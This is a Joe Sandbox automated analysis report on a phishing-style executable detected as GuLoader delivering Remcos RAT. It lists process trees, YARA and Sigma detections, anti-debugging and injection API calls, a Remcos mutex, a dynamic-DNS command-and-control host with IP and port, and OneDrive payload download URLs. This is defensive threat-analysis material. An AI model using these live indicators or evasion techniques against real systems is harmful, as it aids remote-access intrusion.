Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New Doc 20211401#_our new price.exe

Overview

General Information

Sample Name:New Doc 20211401#_our new price.exe
Analysis ID:342481
MD5:14a7ac7e8a7cc68ee2040ea5f3bb145e
SHA1:e7eabd570ec2dce1203d013a11599a8c627b527a
SHA256:cb3e82e9c93c6b7b44dd782d26d22ad26f323176f8662642397d6d271754768d
Tags:exenVpnRATRemcosRAT

Most interesting Screenshot:

Detection

Remcos GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 7092 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Indtastningsfacilitet.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe MD5: 14A7AC7E8A7CC68EE2040EA5F3BB145E)
      • Indtastningsfacilitet.exe (PID: 1340 cmdline: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe MD5: 14A7AC7E8A7CC68EE2040EA5F3BB145E)
  • wscript.exe (PID: 6284 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Indtastningsfacilitet.exe (PID: 3808 cmdline: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe MD5: 14A7AC7E8A7CC68EE2040EA5F3BB145E)
      • Indtastningsfacilitet.exe (PID: 6564 cmdline: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe MD5: 14A7AC7E8A7CC68EE2040EA5F3BB145E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      Process Memory Space: Indtastningsfacilitet.exe PID: 1340JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
        Process Memory Space: Indtastningsfacilitet.exe PID: 1340JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          Process Memory Space: Indtastningsfacilitet.exe PID: 3808JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
            Click to see the 7 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: RemcosShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe, ProcessId: 6556, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeReversingLabs: Detection: 13%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New Doc 20211401#_our new price.exeReversingLabs: Detection: 13%

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: New Doc 20211401#_our new price.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: oluchi.ddns.net
            Source: global trafficTCP traffic: 192.168.2.7:49726 -> 91.193.75.243:2405
            Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digi
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344901282.000000000092D000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344901282.000000000092D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344901282.000000000092D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmpString found in binary or memory: https://fkteua.db.files.1drv.com/
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmpString found in binary or memory: https://fkteua.db.files.1drv.com/y4m1K5aXO_hTJZwQ6sRUBeX3MwbIRGCEyLmUsy6a-Tv86ILmUxMJD16_BkowRYABW7o
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344866328.00000000008F0000.00000004.00000020.sdmpString found in binary or memory: https://fkteua.db.files.1drv.com/y4m7jo0uscLY3JGQOA8WNtz0kE6mECzmykD9EyNeCFL_ih_emej5aweglDZjRx1WKGH
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344796615.00000000008A7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=A32AEA2B4355716B&resid=A32AEA2B4355716B%215171&authkey=APwe6-

            System Summary:

            barindex
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021508B7 EnumWindows,NtSetInformationThread,0_2_021508B7
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02158CE9 NtResumeThread,0_2_02158CE9
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_0215310A NtWriteVirtualMemory,0_2_0215310A
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021587FD NtProtectVirtualMemory,0_2_021587FD
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02159012 NtResumeThread,0_2_02159012
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02157088 NtSetInformationThread,0_2_02157088
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021570B8 NtSetInformationThread,0_2_021570B8
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021536AE NtWriteVirtualMemory,0_2_021536AE
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021592AE NtResumeThread,0_2_021592AE
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021512DE NtSetInformationThread,0_2_021512DE
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021534F5 NtWriteVirtualMemory,0_2_021534F5
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02158CF3 NtResumeThread,0_2_02158CF3
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021508EF NtSetInformationThread,0_2_021508EF
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021532EA NtWriteVirtualMemory,0_2_021532EA
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_0215911A NtResumeThread,0_2_0215911A
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02158F0D NtResumeThread,0_2_02158F0D
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02153187 NtWriteVirtualMemory,0_2_02153187
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02156DB9 NtSetInformationThread,0_2_02156DB9
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02158DF2 NtResumeThread,0_2_02158DF2
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021408B7 EnumWindows,NtSetInformationThread,12_2_021408B7
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02148CE9 NtMapViewOfSection,12_2_02148CE9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_0214310A NtWriteVirtualMemory,12_2_0214310A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021487FD NtProtectVirtualMemory,12_2_021487FD
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02149012 NtMapViewOfSection,12_2_02149012
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02147088 NtSetInformationThread,12_2_02147088
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021470B8 NtSetInformationThread,12_2_021470B8
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021436AE NtWriteVirtualMemory,12_2_021436AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021492AE NtMapViewOfSection,12_2_021492AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021412DE NtSetInformationThread,12_2_021412DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021434F5 NtWriteVirtualMemory,12_2_021434F5
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02148CF3 NtMapViewOfSection,12_2_02148CF3
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021408EF NtSetInformationThread,12_2_021408EF
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021432EA NtWriteVirtualMemory,12_2_021432EA
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_0214911A NtMapViewOfSection,12_2_0214911A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02148F0D NtMapViewOfSection,12_2_02148F0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02143187 NtWriteVirtualMemory,12_2_02143187
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02146DB9 NtSetInformationThread,12_2_02146DB9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02148DF2 NtMapViewOfSection,12_2_02148DF2
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00568CE9 NtQueryInformationProcess,14_2_00568CE9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005608B7 EnumWindows,NtSetInformationThread,14_2_005608B7
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005687FD NtProtectVirtualMemory,14_2_005687FD
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00569012 NtQueryInformationProcess,14_2_00569012
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005612DE NtSetInformationThread,NtProtectVirtualMemory,14_2_005612DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00568CF3 NtQueryInformationProcess,14_2_00568CF3
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005608EF NtSetInformationThread,14_2_005608EF
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00567088 NtSetInformationThread,14_2_00567088
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005670B8 NtSetInformationThread,14_2_005670B8
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005692AE NtQueryInformationProcess,14_2_005692AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_0056911A NtQueryInformationProcess,14_2_0056911A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00568F0D NtQueryInformationProcess,14_2_00568F0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00568DF2 NtQueryInformationProcess,14_2_00568DF2
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00566DB9 NtSetInformationThread,14_2_00566DB9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F08B7 EnumWindows,NtSetInformationThread,15_2_021F08B7
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F8CE9 NtMapViewOfSection,15_2_021F8CE9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F310A NtWriteVirtualMemory,15_2_021F310A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F87FD NtProtectVirtualMemory,15_2_021F87FD
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F9012 NtMapViewOfSection,15_2_021F9012
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F7088 NtSetInformationThread,15_2_021F7088
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F70B8 NtSetInformationThread,15_2_021F70B8
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F36AE NtWriteVirtualMemory,15_2_021F36AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F92AE NtMapViewOfSection,15_2_021F92AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F12DE NtSetInformationThread,15_2_021F12DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F34F5 NtWriteVirtualMemory,15_2_021F34F5
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F8CF3 NtMapViewOfSection,15_2_021F8CF3
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F08EF NtSetInformationThread,15_2_021F08EF
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F32EA NtWriteVirtualMemory,15_2_021F32EA
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F911A NtMapViewOfSection,15_2_021F911A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F8F0D NtMapViewOfSection,15_2_021F8F0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F3187 NtWriteVirtualMemory,15_2_021F3187
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F6DB9 NtSetInformationThread,15_2_021F6DB9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F8DF2 NtMapViewOfSection,15_2_021F8DF2
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00568CE9 NtQueryInformationProcess,16_2_00568CE9
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005608B7 EnumWindows,NtSetInformationThread,16_2_005608B7
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005687FD NtProtectVirtualMemory,16_2_005687FD
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00569012 NtQueryInformationProcess,16_2_00569012
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005612DE NtSetInformationThread,NtProtectVirtualMemory,16_2_005612DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00568CF3 NtQueryInformationProcess,16_2_00568CF3
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005608EF NtSetInformationThread,16_2_005608EF
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00567088 NtSetInformationThread,16_2_00567088
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005670B8 NtSetInformationThread,16_2_005670B8
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005692AE NtQueryInformationProcess,16_2_005692AE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_0056911A NtQueryInformationProcess,16_2_0056911A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00568F0D NtQueryInformationProcess,16_2_00568F0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00568DF2 NtQueryInformationProcess,16_2_00568DF2
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00566DB9 NtSetInformationThread,16_2_00566DB9
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_004041D80_2_004041D8
            Source: New Doc 20211401#_our new price.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Indtastningsfacilitet.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: New Doc 20211401#_our new price.exe, 00000000.00000000.254304802.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBindsaalerne.exe vs New Doc 20211401#_our new price.exe
            Source: New Doc 20211401#_our new price.exe, 00000000.00000002.273121164.0000000002140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs New Doc 20211401#_our new price.exe
            Source: New Doc 20211401#_our new price.exe, 00000002.00000000.271623707.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBindsaalerne.exe vs New Doc 20211401#_our new price.exe
            Source: New Doc 20211401#_our new price.exeBinary or memory string: OriginalFilenameBindsaalerne.exe vs New Doc 20211401#_our new price.exe
            Source: New Doc 20211401#_our new price.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal100.troj.evad.winEXE@13/3@13/2
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-MNA1IV
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF089D9D5C2295B640.TMPJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs'
            Source: New Doc 20211401#_our new price.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: New Doc 20211401#_our new price.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile read: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe 'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe 'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe'
            Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
            Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs'
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess created: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe 'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 1340, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 3808, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 5412, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: New Doc 20211401#_our new price.exe PID: 6344, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 6564, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 1340, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 3808, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 5412, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: New Doc 20211401#_our new price.exe PID: 6344, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Indtastningsfacilitet.exe PID: 6564, type: MEMORY
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_00406A5D push esp; retf 0_2_00406A5E
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_0040701C push edx; retn 0035h0_2_0040701D
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_00406830 push 0000007Eh; retf 0016h0_2_00406832
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_004064D8 push 00000014h; retf 0010h0_2_004064DA
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_004052E0 push 0000007Eh; retf 0_2_004052E2
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_004018AE push ds; ret 0_2_004018B8
